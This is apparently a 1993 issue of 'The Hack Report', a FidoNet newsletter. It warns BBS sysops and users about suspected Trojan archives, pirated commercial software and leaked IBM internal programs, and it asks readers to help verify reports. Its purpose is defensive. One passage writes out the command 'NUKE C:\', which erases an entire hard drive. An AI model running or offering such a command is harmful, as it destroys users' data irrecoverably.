HW Bill Lambdin says he found a file in the Knoxville, Tennessee area
|
|
called BIBLEPR (no description available) that appears a bit suspicious.
|
|
The file contents are:
|
|
|
|
Length Time CRC-32 Attr Name
|
|
------ ---- -------- ---- ----
|
|
34176 11:26 d267f5de --w- BIBLEPR.COM
|
|
158493 00:04 4298ac2d --w- DATAPR-0.DAT
|
|
158493 00:04 d87adf4b --w- DATAPR-1.DAT
|
|
158493 00:08 1213c6b3 --w- DATAPR-2.DAT
|
|
159764 00:08 38d7cc06 --w- DATAPR-3.DAT
|
|
1572 24:05 3a60c80e --w- BIBLEPR.DOC
|
|
------ -------
|
|
670991 6
|
|
|
|
When BIBLEPR.COM executes, Bill says it displays the following message:
|
|
|
|
Greets from DOA!
|
|
|
|
Don't say I didn't warn you! You are also busted!
|
|
|
|
Expect a visit from the SPA!
|
|
|
|
Omni, I will avenge you!
|
|
|
|
Bill's disassembly shows the file contains two INT 26 calls, which are
|
|
DOS Absolute Disk Write instructions. He said that if it contains a
|
|
virus, he was unable to get it to replicate. A copy of the archive has
|
|
been sent to Glenn Jordan at Datawatch Software for testing.
|
|
|
|
|
|
Here's an interesting point, brought to my attention by HW Richard
|
|
Steiner and John Weiss of the RIME Shareware Conference. In previous
|
|
issues, I have listed two files, QM60IST1 and QM60IST2 (reported by
|
|
Francois Thunus, 2:270/25), as pirated copies of QModem v6.0. However,
|
|
Richard and John quite correctly point out that there was no release of
|
|
QModem v6.0 - the program changed to QModem Pro after v5.
|
|
|
|
| This file, or a variant, has also been spotted by Jerry Van Laer of
|
|
| 2:292/805.7, under the name QM60D1-2 and QM60D2-2. In this case, an
|
|
| internal "brag" screen stated the program was QmodemPro 1.0.
|
|
|
|
From what Francois reported, I believe that what he saw was indeed Qmodem
|
|
Pro, now a commercial-only program. However, it was "released" under the
|
|
above filenames. So, is it a Hack? Pirated File? Or what? Doesn't
|
|
matter - it shouldn't be distributed. Thanks, Richard and John, for
|
|
making me fully engage my brain for a change. <grin>
|
|
|
|
|
|
HW Bill Dennison captured a message from Marshall Dudley (Data World BBS,
|
|
(615)966-3574) in the ILink VIRUS FILE conference about the archive
|
|
ASCDEMO. Marshall says that McAfee's ViruScan doesn't detect any
|
|
infection until after you run it and it has infected other files. No
|
|
further information was supplied, other than the internal filenames
|
|
(ASCDEMO.DOC and ASCDEMO.EXE). I need further data on this before I can
|
|
list it in the Trojan Wars section, so please advise if you have any.
|
|
|
|
|
|
HW Emanuel Levy says the file IM, reported by Michael Santos in the
|
|
Intelec Net Chat conference and listed in the 1992 Full Archive edition
|
|
of The Hack Report. Michael's report was a "hearsay" report from one of
|
|
his friends, and stated that the IM screen saver file caused a viral
|
|
infection.
|
|
|
|
Emanuel says the file is an "outer space screen saver," currently under
|
|
the filename IM17. Scott Wunsch (1:140/23.1701) says the program name is
|
|
"Inner Mission," and he currently has version 1.6. In both cases, the
|
|
files were clean.
|
|
|
|
So, it looks like either Michael's friend's system became infected from a
|
|
different source than the IM file, or that an isolated incident of an
|
|
infected IM is involved. No way to tell at this writing.
|
|
|
|
|
|
Long time readers of this report will remember a question concerning the
|
|
status of a screen saver called TUNNEL. Ove Lorentzon (2:203/403.6) and
|
|
Bill Roark (RIME address BOREALIS, Shareware conference, via HW Richard
|
|
Steiner) both stated that the program was an internal IBM test program
|
|
and was not intended for outside distribution.
|
|
|
|
Your Hack Squad has received word from the author of the program, Dan
|
|
Butterfield (Internet, danielb@vnet.ibm.com), that as far as he is aware,
|
|
the program has never been released to the general public. According to
|
|
Dan, "it is still owned by IBM, and as such has been given the IBM
|
|
security classification 'IBM Internal Use Only' which means what it says:
|
|
the program is not for distribution to non-IBM employees."
|
|
|
|
Dan also says that several other "Internal Use Only" programs have been
|
|
"leaked" to the outside world, which implies that these files should not
|
|
be posted for download. One such program was originally called Dazzle
|
|
(NOT to be confused with the other popular DAZZLE screensaver), but has
|
|
entered BBS distribution under the filename O-MY-GOD (also seen as OMG,
|
|
per Michael Burkhart (RIME address CENTER, via HW Richard Steiner).
|
|
However, note that the O-MY-GOD/OMG file was hacked, according to Dan, so
|
|
that all of the "Internal Use Only" references were removed.
|
|
|
|
Another is a program that is usually included inside other archives: the
|
|
program name is PLAYANI. Dan says this has been distributed "along with
|
|
various animations," and also falls under the same Internal
|
|
classification.
|
|
|
|
A prime example of this is an archive called BALLS (not what you think).
|
|
This is an animation of multiple chrome spheres rotating around each
|
|
other above a red and white checkerboard platform. In this case, both
|
|
the player (PLAYANI) _and_ the animation are the property of IBM and are
|
|
not intended for BBS distribution.
|
|
|
|
Again, to quote Dan, "None of these programs are for external
|
|
distribution; all are owned by IBM and are only for use inside IBM by IBM
|
|
employees." Thanks to Dan for all of his help.
|
|
|
|
|
|
Donn Bly has cleared up the question on the status of the Sydex program
|
|
TeleDisk, first raised by Mark Draconis (1:120/324) and Kelvin Lawson.
|
|
Donn was kind enough to mail a copy of a letter sent to him by Sydex
|
|
explaining that Teledisk is no longer shareware. Here is an excerpt from
|
|
the letter:
|
|
|
|
"Effective April 1991, TeleDisk is no longer a shareware
|
|
product. After long consideration, we decided to
|
|
discontinue our offering of the shareware edition of
|
|
TeleDisk, and license it only as a commercial product.
|
|
|
|
"Commercial licenses of TeleDisk are available from Sydex at
|
|
$150 a copy. All shareware distributors and BBS sysops who
|
|
take time to check their sources are requested to remove
|
|
TeleDisk from shareware distribution."
|
|
|
|
The letter is signed by Miriam St. Clair for Sydex. To summarize, Sydex
|
|
is no longer accepting shareware registrations for TeleDisk, and asks
|
|
that it be not be made available for download from BBS systems.
|
|
|
|
Thanks to Donn for his help in this matter.
|
|
|
|
|
|
HW Ken Whiton forwards messages from Harold Stein, Gary Rambo, and Gwen
|
|
Barnes of Mustang Software, Inc., about a "patch" program aimed at
|
|
OffLine Xpress (OLX) v1.0. The patch is supposed to allow OLX to
|
|
read and reply to Blue Wave packets, along with a lot of other seemingly
|
|
unbelievable feats. Gwen Barnes did not seem to know of the patch, but
|
|
published the following advice in the WildNet SLMROLX conference to
|
|
anyone considering trying it:
|
|
|
|
1. Make a complete backup of your system.
|
|
2. Make sure you've got all the latest SCAN stuff from McAfee
|
|
3. Try it, keeping in mind that it more than likely does nothing
|
|
at all, or is a trojan that will hose your system.
|
|
4. Get ready to re-format and restore from backups if this is in
|
|
fact the case.
|
|
|
|
No filename was given for this patch. If anyone runs across a copy of
|
|
it, please contact one of The HackWatchers or myself so that we can
|
|
forward a copy to MSI for testing.
|
|
|
|
|
|
HW Bill Lambdin reports that someone has taken all of McAfee Associates'
|
|
antiviral programs and combined them into one gigantic (over 700k)
|
|
archive. He did not say whether the files had been tampered with, but he
|
|
did send a copy to McAfee for them to dissect. The file was posted under
|
|
the filename MCAFEE99. I would not suggest downloading this file: as a
|
|
matter of fact, this reporter prefers to call McAfee's BBS directly when
|
|
a new version of any of their utilities comes out. I highly recommend
|
|
this method, since it insures that you will receive an official copy.
|
|
|
|
|
|
HW Matt Kracht forwarded a message from Stu Turk in the DR_DEBUG
|
|
echo about possible Trojans going around as PKZIP 2.21 and/or 2.22. Stu
|
|
also says that there is a warning about these in circulation. If you
|
|
have a copy of this warning, please send a copy to Hack Central Station
|
|
(1:124/4007).
|
|
|
|
=========================================================================
|
|
|
|
Information, Please
|
|
|
|
This the section of The Hack Report, where your Hack Squad asks for
|
|
_your_ help. Several reports come in every week, and there aren't enough
|
|
hours in the day (or fingers for the keyboards) to verify them all. Only
|
|
with help from all of you can The Hack Report stay on top of all of the
|
|
weirdness going on out there in BBSLand. So, if you have any leads on
|
|
any of the files shown below, please send it in: operators are standing
|
|
by.
|
|
|
|
|
|
| Chuck Hammock (1:392/20) reported in the FidoNet DIRTY_DOZEN echo that
|
|
| one of his users uploaded a file called PASTUT24. The user warned Chuck
|
|
| that this file was infected with the Kamikazee virus. I was unable to
|
|
| get further information on this, so Chuck, if you are reading this (or if
|
|
| anyone else can confirm this), please send me some NetMail on your
|
|
| results.
|
|
|
|
|
|
| Russell Wagner reported a problem with a copy of VMIX222. This shareware
|
|
| multitasker is currently at v2.87. Russell claims to have found a
|
|
| possible isolated incident of a Trojan version of the program. He wound
|
|
| up scrambling the FAT on his C: drive when he ran the program, and was
|
|
| able to reproduce the damage in subsequent tests. He only ran the
|
|
| program on one system, however, so it is not clear as to whether he has
|
|
| found a true Trojan claiming to be the real VMiX, a corrupted copy of the
|
|
| file, or whether he has some sort of hardware incompatibility. If anyone
|
|
| else has run into a problem with v2.22 of this program, please advise.
|
|
|
|
|
|
Robert Rothenburg (Internet robert.rothenburg@asb.com) received a file
|
|
called JAMMER that he says is very suspicious. The archive had a file
|
|
with the name JAMMER.EXE and a description that said something to the
|
|
effect of, "run this first and your calls won't be traced."
|
|
|
|
He looked through the executable and found the name "Nmodem Jammer 2.8",
|
|
along with "some other claims about adjusting the modem configuration"
|
|
and "some nasty insults to a couple of people." Virus scanners showed
|
|
nothing, so he looked at the interrupts. He says it "looks like it
|
|
installs a TSR of sorts and does some disk writes." He concludes that
|
|
the file possibly "instals a virus or just damages certain files, though
|
|
i suspect it will go after the comm program, as a message says when it
|
|
ends to 'run your communications program now!'".
|
|
|
|
I am attempting to get a copy of this from Robert for further testing -
|
|
please be on the lookout for a copy, and notify your local HackWatcher or
|
|
myself if you see it.
|
|
|
|
|
|
Jim Tinlin (1:206/2604) brought into question a file called CRAPS, which
|
|
looks like a shareware Craps game for Windows. However, a line inside
|
|
the internal README.TXT file reads as follows:
|
|
|
|
"As a licensed owner, please do not distribute this copy to others"
|
|
|
|
To further confuse matters, the game displays an opening screen that
|
|
states it is indeed shareware and should be distributed. The file
|
|
contents are as follows:
|
|
|
|
CRAPS EXE 264007 05-13-93 9:05aC
|
|
CRAPS HLP 40043 04-12-93 7:16aC
|
|
README TXT 5322 04-12-93 7:02aR
|
|
5 file(s) 309372 bytes
|
|
|
|
This is another one that makes us scratch our heads here at Hack Central
|
|
Station. Any information would be appreciated.
|
|
|
|
|
|
HW Bob Seaborn forwarded a message from Kevin Haverstock (via Tom Scott,
|
|
1:140/47) about a file called TCM_V511. This was described as "The
|
|
Configuration Manager," a system configuration utility. Kevin's report
|
|
said that once you finish running the setup, your computer reboots and
|
|
you get a prompt that "scrolls your screen and locks up your system." He
|
|
was unable to access his hard drive after booting from a system disk - a
|
|
reformat was required.
|
|
|
|
I am familiar with a legitimate shareware program called The
|
|
Configuration Manager, but not under version number 5.11, nor under the
|
|
above filename. I can't be sure if Kevin's problems were the result of a
|
|
hardware error, user error, or an isolated incident of a tampered
|
|
archive. If anyone has any information on what could have caused this,
|
|
please enlighten me.
|
|
|
|
|
|
Harold Stein (1:107/236) found a file called STETRIS, claiming to be a
|
|
Super Tetris game. He says that there was a shareware version of this
|
|
that was released about a year ago, but has since been renamed due to a
|
|
conflict with a commercial game of the same name. He is not sure whether
|
|
or not he found the old shareware file or a pirated copy of the
|
|
commercial file. The archive (in .zip format, presumably using v2.04g)
|
|
was 55,318 bytes long, and the archive date had been "touched" by the BBS
|
|
it was uploaded to, forcing it to March 23, 1993 (Editorial: this renders
|
|
filedates rather useless, IMHO. -lj)
|
|
|
|
Based on further information from Jeff Hancock (1:3600/7), it seems now
|
|
that Harold may have either an older shareware version, an incomplete
|
|
archive, or a different program altogether. Jeff's copy of the shareware
|
|
version was only 47480 bytes (compressed with ARJ). He has seen the
|
|
commercial game, and says it is "MUCH larger". With this information, I
|
|
consider the matter closed. Thanks to Jeff for his help.
|
|
|
|
|
|
Peter Hempel (1:229/15) posted a message in the FidoNet Echo VIRUS about
|
|
the file BREAKIT!, which was described as follows:
|
|
|
|
BREAKIT!.ZIP 6714 03-29-93 (CRS) A Gw-Basic Code And Cipher Program
|
|
Allowing You To Enter Ascii Characters, To
|
|
Save Them, And To Encode And Decode.
|
|
|
|
Peter claims that this program erased his root directory, but says he was
|
|
able to recover everything by booting from a write-protected system disk
|
|
and using the Norton Utilities UNERASE command. The archive contents are
|
|
as follows:
|
|
|
|
Name Original Method Packed CR% Date Time CRC
|
|
============ ======== ======== ======== === ======== ======== ========
|
|
BREAKIT!.BAS 4453 Implode 2604 58 1-24-93 11:25:24 42CA0CE4
|
|
CODEFILE.FIL 1240 Implode 550 44 3-28-92 10:52:44 B6ADEB20
|
|
PRINTME.BAT 31 Stored 31 100 1-24-93 11:54:12 965CF8AE
|
|
VIEW.COM 958 Implode 876 91 3-19-92 19:11:46 47C5E5EF
|
|
README.BAT 30 Stored 30 100 1-24-93 11:52:32 95294A43
|
|
BRK.BAT 40 Stored 40 100 1-24-93 11:53:32 FC9F3B2E
|
|
BREAKIT!.DOC 2679 Implode 1440 54 1-24-93 11:56:06 EC302AFA
|
|
============ ======== ======== ======== === ======== ======== ========
|
|
7 9431 ZIP 5571 59 1-24-93 11:56:06
|
|
|
|
He did not say which file did the damage. I do not know if this is a
|
|
Trojan or an infected file - in either case, it may well be an isolated
|
|
incident. Test results would be greatly appreciated.
|
|
|
|
|
|
Lowell Shatraw (1:315/6) states that there may be two pirated commercial
|
|
fax programs floating around under the filenames FAX and PC_FAX. The
|
|
archives he reported on were in ARJ format and were 447,693 and 101,089
|
|
bytes long, respectively. The file dates were Dec. 4, 1992, and May 26,
|
|
1992 - no way to tell if the BBS "touched" the filedates. Lowell is also
|
|
not sure which commercial products these may be. If you happen to run
|
|
across one or both of these, please look inside them - if they are
|
|
commercial, please let me know (after you delete your copies, of course!
|
|
<g>).
|
|
|
|
|
|
A message from Tony Lim (1:120/314, forwarded by Jack Cross, 1:3805/13)
|
|
states that he had a user upload a file called TAG-NFO, which turned out
|
|
to be a Trojan. No details about the Trojan were given, so any
|
|
confirmation of this would be appreciated.
|
|
|
|
|
|
HW Bill Lambdin forwards a message from Mario Giordani in the ILink Virus
|
|
Conference about two files. The archives, called PHOTON and NUKE, are
|
|
possibly droppers, containing a file called NUKE.COM which "will trash
|
|
your HD."
|
|
|
|
Pat Finnerty (1:3627/107) sent a reply to the last report of this,
|
|
stating that he has a copy of a PC Magazine utility called NUKE.COM,
|
|
which is used to remove subdirectories which contain "nested subs,
|
|
hidden, read-only (you name it)." He says that the command NUKE C:\ will
|
|
effectively delete everything on a hard drive, with no chance of repair.
|
|
This is merely the way the program is designed.
|
|
|
|
I do not know if this is what happened in Mario's case, or if Mario
|
|
actually found a copy (read: isolated incident) which was infected. Bill
|
|
has asked Mario for further information, and I would like to echo his
|
|
call for help. If you know of this, please lend a hand.
|
|
|
|
|
|
Ned Allison (1:203/1102) forwarded a report into the FidoNet DIRTY_DOZEN
|
|
echo from a user of The Mailbox BBS in Cleveland (216/671-7534) named
|
|
Rich Bongiovanni. Rich reports that there is a file floating around
|
|
called DEMON WARS (archive name DMNWAR52) that is "infected with a
|
|
virus." If true, this may be an isolated incident. I would appreciate
|
|
confirmation on this.
|
|
|
|
|
|
Greg Walters (1:270/612) reports a possible isolated incident of a
|
|
problem with #1KEEN7. When he ran the installation, he began seeing on
|
|
his monitor "what looked like an X-rated GIF." The file apparently
|
|
scanned clean. Any information on similar sightings would be
|
|
appreciated.
|
|
|
|
|
|
A report from Todd Clayton (1:259/210) concerns a program called
|
|
ROBO.EXE, which he says claims to apparently "make RoboBoard run 300%
|
|
faster." He says he has heard that the program fools around with your
|
|
File Allocation Table. I have not heard any other reports of this, so I
|
|
would appreciate some confirmation from someone else who has seen similar
|
|
reports.
|
|
|
|
|
|
Kelvin Lawson (2:258/71) posted a message in the SHAREWRE echo about a
|
|
possible hack of FEBBS called F192HACK. I have not seen this file, nor
|
|
has the author of FEBBS, Patrik Sjoberg (2:205/208). He forwards the
|
|
file sizes in the archive, reported here:
|
|
|
|
Name Length Mod Date Time CRC
|
|
============ ======== ========= ======== ========
|
|
FEBBS.EXE 220841 09 Mar 92 21:17:00 96D2E08D
|
|
014734.TXT 1403 26 Aug 92 01:59:18 3B9F717F
|
|
============ ======== ========= ======== ========
|
|
*total 2 222244 26 Aug 92 01:59:24
|
|
|
|
Kelvin says the .TXT file is just an advert for a BBS, so it is "not
|
|
relevant!". As I said, the author of FEBBS has never seen this file, so
|
|
I've asked Kelvin to forward a copy of it to him.
|
|
|
|
|
|
Andrew Owens (3:690/333.11) forwarded a report of a "Maximus BBS
|
|
Optimiser," going under the filenames MAX-XD and MAXXD20. Scott Dudley,
|
|
the author of Maximus, says he did not write any programs that have these
|
|
names, but he does not know whether they are or are not legitimate third
|
|
party utilities. I have requested further information from Andrew on
|
|
this topic, and would appreciate anyone else's information, if they have
|
|
any.
|
|
|
|
|
|
Yet another short warning comes from David Bell (1:280/315), posted in
|
|
the FidoNet SHAREWRE echo, about a file called PCPLSTD2. All he says is
|
|
that it is a Trojan, and that he got his information from another
|
|
"billboard" and is merely passing it on. Again, please help if you know
|
|
what is going on here.
|
|
|
|
|
|
A message in the FidoNet ASIAN_LINK echo from Choon Hwee (1:3603/263)
|
|
grabbed my attention the moment I saw it: in capital letters, it said,
|
|
"DO NOT RUN this file called MODTEXT.EXE, cause it is a TROJAN!!!". He
|
|
goes on to say that two BBSs have been destroyed by the file. However,
|
|
that's about all that was reported. I really need more to go on before I
|
|
can classify this as a Trojan and not just a false alarm (i.e., archive
|
|
name, what it does, etc.). Please advise.
|
|
|
|
|
|
| Greg Mills (1:16/390) posted a question to Robert Jung in the ARJ Support
|
|
| Echo (FidoNet) about a version of ARJ called 2.33. It was unclear as to
|
|
| whether or not Mr. Mills had seen the file. Mr. Jung has stated that
|
|
| this is not a legitimate release number. It is possible that the
|
|
| references Greg saw about 2.33 were typos, but you never know. Please
|
|
| help your Hack Squad out on this one - if you see it, report it.
|
|
|
|
=========================================================================
|
|
|
|
The Meier/Morlan List
|
|
|
|
| Here is the current status of the files contained in the Meier/Morlan
|
|
| List. This is the last month for requests for information on this part
|
|
| of The Hack Report, as I have placed a deadline of September 30th on the
|
|
| files in this list. They've been reported for quite some while now, and
|
|
| the verifications have slowed to a trickle. If the files listed below
|
|
| can't be verified in time for the October issue, I will need to write
|
|
| them off as false alarms.
|
|
|
|
|
|
=== Previous comments on the files in the list: ===
|
|
|
|
|
|
Shane Paul of Softdisk Publishing (RIME, via HW Richard Steiner),
|
|
comments on the SLORDAX game:
|
|
|
|
"If the SLORDAX game if by Gamer's Edge and copyrighted by Softdisk
|
|
then it is a pirated copy."
|
|
|
|
I can't be sure that this is the case, so the file stays on the list
|
|
until someone can verify this.
|
|
|
|
|
|
Lee Madajczyk (1:280/5) surmises that HARRIER could be Harrier Combat
|
|
Simulator by Mindscape, Inc. He says that he hasn't seen anything from
|
|
them in quite a while, and doesn't know if the company is still in
|
|
business.
|
|
|
|
|
|
Here are the remaining unresolved reports from HW Emanuel Levy:
|
|
|
|
"387DX - sounds like a Math Co-Processor emulator - might be legit
|
|
|
|
"Barkeep sounds like it may be a version of Tapper. If you send beer mugs
|
|
down the screen to patrons and then have to pick up the returning mugs
|
|
and they leave tips, then it is Tapper. Or it may be an OLD game
|
|
published in Compute Mag. If it is the one from Compute only those who
|
|
have the Compute issue with the game in it are allowed to have a copy.
|
|
|
|
"Harrier is either Harrier Jiump Jet or Space Harrier from Sega wich came
|
|
out for the Commodore 64 in 89 so I would assume it came out for IBM
|
|
around then too.
|
|
|
|
"Gremlins- There was an Gremlins Text Adventure and a Video Came for the
|
|
computer. The video game was put out by Atari
|
|
|
|
Thanks, Emanuel.
|
|
|
|
|
|
For those who have missed it before, here is what is left of the list of
|
|
files forwarded by Joe Morlan (1:125/28), as compiled by Wes Meier, SysOp
|
|
of the WCBBS (1-510-937-0156) and author of the AUNTIE BBS system. Joe
|
|
says Wes keeps a bulletin of all rejected files uploaded to him and the
|
|
reasons they were rejected. Joe also says he cannot confirm or deny the
|
|
status of any of the files on the list.
|
|
|
|
There are some that I am not familiar with or cannot confirm. These are
|
|
listed below, along with the description from Wes Meier's list.
|
|
|
|
Due to the unconfirmed nature of the files below, the filenames are not
|
|
included in the HACK????.COL and HACK????.IDX files that are a part of
|
|
the archive of The Hack Report. I would appreciate any help that
|
|
anyone can offer in verifying the status of these files. Until I receive
|
|
verification on them, I will not count them as either hacks or pirated
|
|
files. Remember - innocent until proven guilty.
|
|
|
|
My thanks go to Joe and Wes for their help.
|
|
|
|
Filename Reason for Rejection
|
|
======== =============================================
|
|
BARKEEP Too old, no docs and copyrighted with no copy
|
|
permission.
|
|
HARRIER Copyrighted. No permission to copy granted.
|
|
SLORGAME Copyrighted. No docs. No permission to copy
|
|
granted.
|
|
NOVELL Copyrighted material with no permission to
|
|
BBS distribute
|
|
DRUMS I have no idea if these are legit or not. No
|
|
docs.
|
|
GREMLINS No documantation or permission to copy given.
|
|
CLOUDKM A hacked commercial program.
|
|
MENACE Copyrighted. No docs. No permission to copy
|
|
granted.
|
|
SNOOPY Copyrighted. No docs. No permission to
|
|
copy granted.
|
|
SLORDAX Copyrighted. No docs. No permission to
|
|
copy granted.
|
|
ESCAPE Copyrighted. No docs. No permission to
|
|
copy granted.
|
|
BANNER Copyrighted. No docs. No permission to
|
|
copy granted.
|
|
387DX Copyrighted. No docs or permission to
|
|
copy granted.
|
|
WINDRV Copyrighted. No permission to copy granted.
|
|
|
|
=========================================================================
|
|
|
|
Help!!!
|
|
|
|
Would the person who sent the copy of Vegas Casino 2 (filename VEGAS2) to
|
|
The Hack Squad for testing/verification please re-identify themselves via
|
|
NetMail? Somehow, your message went to the great Bit Bucket in the sky.
|
|
Thanks in advance!
|
|
|
|
=========================================================================
|
|
|
|
Clarifications and Thanks
|
|
|
|
Folks, the LHA mystery has finally been resolved, thanks to Scott Fell
|
|
(1:124/6119), Steve Quarrella (1:124/9005), and Kenjirou Okubo, the
|
|
support person for LHA. Your Hack Squad finally received the Internet
|
|
address for Kenjirou Okubo (kenjirou@mathdent.im.uec.ac.jp), and managed
|
|
to verify Scott Fell's own contact, relayed via Steve.
|
|
|
|
If you recall, Onno Tesink (2:283/318) found a file called LHA255B. This
|
|
claims to be version 2.55b of the LHA archiver, with a file date in the
|
|
executable of 12/08/92. Onno's report was the one that started the
|
|
search.
|
|
|
|
Kenjirou knew of this version and verified its legitimacy. He also
|
|
provided some other very helpful information, which is best relayed by
|
|
quoting his message to me:
|
|
|
|
"For DOS, currently lha256a1 is under testing in a closed
|
|
circle for networking environment. After LHA213, dos5 appeared
|
|
in Japan and Yoshi started his series LHA25x series. The two
|
|
versions you mentioned seem to fall under this series. The
|
|
latest version which might be distributed by me is LHA254 for
|
|
people who wants to test -lh6- algorithm."
|
|
|
|
He went on to provide the following information on how to verify your
|
|
copy of LHA:
|
|
|
|
"Any version ending with LHA25xb is a beta test version, and
|
|
LHA25xa is for a limited circulation. To test whether these
|
|
files are legitimate release either from Yoshi or me, please
|
|
use -t option to check two dimensional CRC self-validation
|
|
check. We believe our test will check the validation with
|
|
10E-38 % of error probability."
|
|
|
|
From my own testing, here is the best way to run the verification:
|
|
|
|
1. Extract LHA.EXE from the suspect archive and place it in an
|
|
empty subdirectory that is not on your path. (example:
|
|
c:\foo\lha.exe).
|
|
|
|
2. Change directories to the one which contains a known good copy
|
|
of LHA.EXE.
|
|
|
|
3. Execute the command LHA t drive:\path\LHA.EXE. Using the above
|
|
example, your command line would look like this:
|
|
|
|
C:\LHADIR>LHA t C:\FOO\LHA.EXE
|
|
|
|
This will execute the known good copy of lha, which will test the suspect
|
|
copy and report whether or not the file "appears" to be the original or
|
|
not. Even though the older LHA is doing the testing, it will be able to
|
|
verify the newer copy.
|
|
|
|
Please note that Scott Fell's information was that the author does not
|
|
want these copies distributed. However, it seems that the folks working
|
|
on LHA are aware that some betas have "escaped" into circulation. In
|
|
other words, use any betas _entirely_ at your own risk.
|
|
|
|
Scott and Steve have my undying gratitude for helping to lay this to
|
|
rest, most notably by locating Kenjirou's Internet address and following
|
|
through on it. Thanks from all of us!
|
|
|
|
*************************************************************************
|
|
|
|
Conclusion
|
|
|
|
If you see one of the listed files on a board near you, it would be a
|
|
very friendly gesture to let the SysOp know. Remember, in the case of
|
|
pirated files, they can get in just as much trouble as the fiend who
|
|
uploads pirated files, so help them out if you can.
|
|
|
|
***HACK SQUAD POLICY***
|
|
|
|
The intent of this report is to help SysOps and Users to identify
|
|
fraudulent files. To this extent, I give credit to the reporter of a
|
|
confirmed hack. On this same note, I do _not_ intend to "go after" any
|
|
BBS SysOps who have these programs posted for d/l. The Shareware World
|
|
operates best when everyone works together, so it would be
|
|
counter-productive to "rat" on anyone who has such a file on their board.
|
|
Like I said, my intent is to help, not harm. SysOps are strongly
|
|
encouraged to read this report and remove all files listed as "confirmed"
|
|
from their boards. I can not and will not take any "enforcement action"
|
|
on this, but you never know who else may be calling your board. Pirated
|
|
commercial software posted for d/l can get you into _deeply_ serious
|
|
trouble with certain authorities.
|
|
|
|
Updates of programs listed in this report need verification. It is
|
|
unfortunate that anyone who downloads a file must be paranoid about its
|
|
legitimacy. Call me a crusader, but I'd really like to see the day that
|
|
this is no longer true. Until then, if you _know_ of a new official
|
|
version of a program listed here, please help me verify it.
|
|
|
|
On the same token, hacks need to be verified, too. I won't be held
|
|
responsible for falsely accusing the real thing of being a fraud. So,
|
|
innocent until proven guilty, but unofficial until verified.
|
|
|
|
Upcoming official releases will not be included or announced in this
|
|
report. It is this Moderator's personal opinion that the hype
|
|
surrounding a pending release leads to hacks and Trojans, which is
|
|
exactly the opposite of what I'm trying to accomplish here.
|
|
|
|
If you know of any other programs that are hacks, bogus, jokes, hoaxes,
|
|
etc., please let me know. Thanks for helping to keep shareware clean!
|
|
|
|
Lee Jackson, Author, The Hack Report
|
|
Moderator, FidoNet Int'l Echos SHAREWRE and WARNINGS (1:124/4007)
|